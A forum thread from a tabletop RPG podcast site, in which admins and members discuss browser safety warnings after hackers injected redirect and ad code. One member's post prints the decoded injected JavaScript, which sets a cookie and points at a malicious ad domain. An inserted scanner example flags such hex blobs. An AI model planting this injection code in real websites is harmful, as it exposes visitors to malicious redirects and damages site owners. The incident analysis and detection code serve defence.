Site Alerts


74 replies to this topic

#1 Hal

Hal

    Site Owner

  • Administrators
  • 8,095 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 02 February 2016 - 10:56 AM

Hey there

 

Some of you may be seeing some alerts regarding the safety of the site. We are good - we managed to pick up some Chinese redirect code briefly but we have removed it and are in the process of getting Google to verify that it is gone so the nasty screen will go away...

 

Cheers

Hal :hal:


  • 1

#2 Hal

Hal

    Site Owner

  • Administrators
  • 8,095 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 04 February 2016 - 08:02 AM

And we are clean and shiny once more so the red screen of terror should be vanishing in 3, 2, 1...

 

Thanks Google!

 

Hal :hal:


  • 1

#3 Aethyr

Aethyr

    Frog

  • Members
  • 340 posts
  • Amazon Wishlist
  • LocationVirginia

Posted 04 February 2016 - 01:53 PM

Woot woot!

 

Glad to hear it was just redirect code and such. For a while I figured someone had been listening to the podcasts and was trying to keep such filth, I mean quality entertainment from reaching the public.


  • 0

#4 BigJackBrass

BigJackBrass

    Whartson Hall Gamer

  • Administrators
  • 4,601 posts
  • Amazon Wishlist
  • LocationStalybridge

Posted 04 February 2016 - 03:23 PM

For a while I figured someone had been listening to the podcasts and was trying to keep such filth, I mean quality entertainment from reaching the public.


Nah, that's just Hal falling behind with the releases again ;)
  • 0

#5 Hal

Hal

    Site Owner

  • Administrators
  • 8,095 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 08 February 2016 - 10:31 PM

And now.... I am having issues getting files from The Vault to the site... Goddamit....... we are working on it so expect a massive release of all kinds of ear joy as soon as we figure out what is going on.... I know @Cob37 will be happy when we get his resolve - the Skell guys have a bunch of stuff waiting to release along with Whartson Hall and a few other folks including our good selves :D

Hal :hal:
  • 1

#6 Aethyr

Aethyr

    Frog

  • Members
  • 340 posts
  • Amazon Wishlist
  • LocationVirginia

Posted 09 February 2016 - 06:41 AM

Yay! I wish you luck in getting the issue fixed. I've had to listen to MUSIC at work lately! The horror!

Actually I've been listening to the old Kingmaker campaign but I have missed the newer stuff.
  • 0

#7 Hal

Hal

    Site Owner

  • Administrators
  • 8,095 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 09 February 2016 - 07:33 AM

This issue is separate from the red screen of terror we think but may have been caused by fixing that :)

 

I have a ticket in with the CMS folks to see if they can help us out...

 

Hal :hal:


  • 0

#8 thad

thad

    Player Subordinaire

  • Members
  • 383 posts
  • LocationNew Zealand

Posted 09 February 2016 - 11:52 AM

And red screen is back! (for me just now at least)


  • 0

#9 Aethyr

Aethyr

    Frog

  • Members
  • 340 posts
  • Amazon Wishlist
  • LocationVirginia

Posted 09 February 2016 - 12:13 PM

Same here :(
  • 0

#10 kendoyle659

kendoyle659

    RPGMP3 Patron

  • Patrons
  • 440 posts
  • LocationYork

Posted 09 February 2016 - 02:28 PM

I've got it too I'm afraid


  • 0

#11 Hal

Hal

    Site Owner

  • Administrators
  • 8,095 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 10 February 2016 - 03:52 PM

Grrrrrrrr - it's a different check that Google is running now it seems... Pfft

 

(pokes the code)

 

Google is going to kill small sites if they carry on like this...

 

Hal :hal:


  • 0

#12 JamieMcCrimmon

JamieMcCrimmon

    Raven

  • Patrons
  • 44 posts

Posted 14 February 2016 - 06:55 AM

I don't think you guys are out of the woods yet. Now, this MAY be legitimate advertiser code, but I very much doubt it. RequestPolicy (a Firefox addon I use) detected an attempt by the homepage to connect to "sinyayamorda.info". I googled this domain and found that it had been registered yesterday and that there was very little publicly available information about it. I used the Web Developer addon to probe further, and found a suspicious-looking block of code at the end of http://www.rpgmp3.co...cks/compiled.js which decoded this great long chunk of hex:

into (I wrote a short C++ script to do the decode)
    window.onload = function () {
        // Set cookie a=b, optionally expiring c days from now.
        function x22bq(a, b, c) {
            if (c) {
                var d = new Date();
                d.setDate(d.getDate() + c);
            }
            if (a && b) document.cookie = a + '=' + b + (c ? '; expires=' + d.toUTCString() : '');
            else return false;
        }
        // Read cookie a; returns false when it is not set.
        function x33bq(a) {
            var b = new RegExp(a + '=([^;]){1,}');
            var c = b.exec(document.cookie);
            if (c) c = c[0].split('=');
            else return false;
            return c[1] ? c[1] : false;
        }
        var x33dq = x33bq("74f6a8c44ea1d35c958edad7780b866a");
        // Marker cookie not present: set it for one day, then append a div to the page.
        if (x33dq != "023828986382b8fa52daf0683db26cd0") {
            x22bq("74f6a8c44ea1d35c958edad7780b866a", "023828986382b8fa52daf0683db26cd0", 1);
            var x22dq = document.createElement("div");
            var x22qq = "http://css.sinyayamorda.info/megaadvertize/?NLTpdBUP=wrpuVqFU&TJUvWVOODaudPFWAQUi=IUZoFqUuNKB&pZuOZlVsyDGyl=eWJNmEtzRZUZAgWr&mhGlpKrw=ePzwsABabsz&LjfALvCvmS=fJddpfNZAsIg&eKCjISyIEsajYWlrd=YrvQAkFvsOJ&RwMJbQkLd=NsMPRfmaOdboYIjLuXd&AnDQcwOZaa=suMdkohxI&WwhRIeWGnaE=TlohaXFtyZVdo&CaFWKjmgFR=hbDbJgJo&keyword=24cb9ff43897bc1f8d0f6c077aa11691";
            x22dq.innerHTML = ""; // value as it survives in the post; x22qq is not used in what remains
            document.body.appendChild(x22dq);
        }
    }
This looks very suspicious, and I think you guys really are getting hacked and Google is right to flag the current state of the site as suspicious.

EDIT: Definitely a hack - see https://productforum...ers/g_haABTaDXg for someone else who got hit by the same thing. Looks like the hack generates different .info domains for different hacked sites.
  • 0
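The check described in the post above (finding a long hex blob appended to a script and decoding it to see what it does), as an added example that is not part of the thread or the site's own code. It decodes the blob as text only and never evaluates it. The blob format (plain hex digits or `\xNN` escapes), the function names, the allowlist and the sample bundle are assumptions constructed for illustration.

```javascript
// Added example: static scan of a JavaScript file for long hex-encoded blobs.
// Assumption: the blob is a plain run of hex digits or a run of \xNN escapes.
const HEX_RUN = /(?:\\x[0-9a-fA-F]{2}){40,}|(?:[0-9a-fA-F]{2}){40,}/g;
const HOST = /https?:\/\/([a-z0-9.-]+)/gi;

function decodeHex(run) {
  const digits = run.replace(/\\x/g, "");
  let out = "";
  for (let i = 0; i + 1 < digits.length; i += 2) {
    out += String.fromCharCode(parseInt(digits.slice(i, i + 2), 16));
  }
  return out;
}

function scanScript(source, allowedHosts) {
  const findings = [];
  for (const m of source.matchAll(HEX_RUN)) {
    const decoded = decodeHex(m[0]);
    // Skip runs that do not decode to mostly printable ASCII (hashes, binary data).
    const printable = decoded.replace(/[^\x20-\x7e\r\n\t]/g, "").length;
    if (printable / decoded.length < 0.95) continue;
    const hosts = [...decoded.matchAll(HOST)].map(h => h[1].toLowerCase());
    findings.push({
      offset: m.index,
      fromEnd: source.length - (m.index + m[0].length), // small value: appended at end of file
      setsCookie: /document\.cookie/.test(decoded),
      injectsDom: /appendChild|innerHTML|document\.write/.test(decoded),
      unknownHosts: [...new Set(hosts)].filter(h => !allowedHosts.includes(h)),
      decoded,
    });
  }
  return findings;
}

// Constructed sample: an ordinary-looking bundle with a hex blob appended.
function toHex(s) {
  return [...s].map(c => c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
}
const payload =
  'window.onload=function(){document.cookie="m=1";var d=document.createElement("div");' +
  'd.innerHTML="http://css.injected.example/x";document.body.appendChild(d);}';
const sampleBundle =
  'function menu(){return "#a1b2c3";}\n' +
  'var sha="da39a3ee5e6b4b0d3255bfef95601890afd80709";\n' +
  'var _0x="' + toHex(payload) + '";';

const sampleFindings = scanScript(sampleBundle, ["www.example.org"]);
console.log(sampleFindings);
```

Run over every served `.js` file on a schedule, a finding with a small `fromEnd` and a non-empty `unknownHosts` is the pattern reported here: a decodable blob appended to an existing script that points at a host the site does not use.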

#13 Thing

Thing

    a Bad Man

  • Administrators
  • 12,601 posts
  • LocationNear Seattle, WA, USA

Posted 14 February 2016 - 05:14 PM

Yeah, it looks like a bot is adding the ad code to some of our JavaScript files and putting it back as I remove it.

I'm tracking down the exploits being used and will be disabling them shortly and start another cleaning. I would block the attackers up a, but it looks like a distributed attack through several sites in China, Russia, Tajikistan, and a couple other countries and will personally shift around more.

Luckily it looks like they are mostly just trying to show ads and get some hits for other sites. I haven't seen anything truly malicious yet.

I'll post more when I'm a bit ahead of this
  • 0

#14 Hafwit 2.0

Hafwit 2.0

    Goblin

  • Members
  • 161 posts
  • LocationSvendborg, Denmark

Posted 19 February 2016 - 07:35 AM

It seems to have stopped?
  • 0

#15 Aethyr

Aethyr

    Frog

  • Members
  • 340 posts
  • Amazon Wishlist
  • LocationVirginia

Posted 19 February 2016 - 08:10 AM

No more site herpes?
  • 0

#16 Aethyr

Aethyr

    Frog

  • Members
  • 340 posts
  • Amazon Wishlist
  • LocationVirginia

Posted 19 February 2016 - 08:10 AM

No more site herpes?
  • 0

#17 Hal

Hal

    Site Owner

  • Administrators
  • 8,095 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 19 February 2016 - 08:12 AM

We are hopeful :) We might be getting back to normal (fingers crossed) We have performed some hardening of the security on the server as well as some things on the site so let us know if you see anything hokey happening :) Hal :hal:
  • 0

#18 Hal

Hal

    Site Owner

  • Administrators
  • 8,095 posts
  • Amazon Wishlist
  • LocationHouston, TX

Posted 19 February 2016 - 08:13 AM

We are hopeful :) We might be getting back to normal (fingers crossed) We have performed some hardening of the security on the server as well as some things on the site so let us know if you see anything hokey happening :) Hal :hal:
  • 0

#19 Aethyr

Aethyr

    Frog

  • Members
  • 340 posts
  • Amazon Wishlist
  • LocationVirginia

Posted 19 February 2016 - 04:47 PM

Other than the double posts? :)
  • 0

#20 Hafwit 2.0

Hafwit 2.0

    Goblin

  • Members
  • 161 posts
  • LocationSvendborg, Denmark

Posted 20 February 2016 - 03:45 PM

Other than the double posts? :)
  • 0



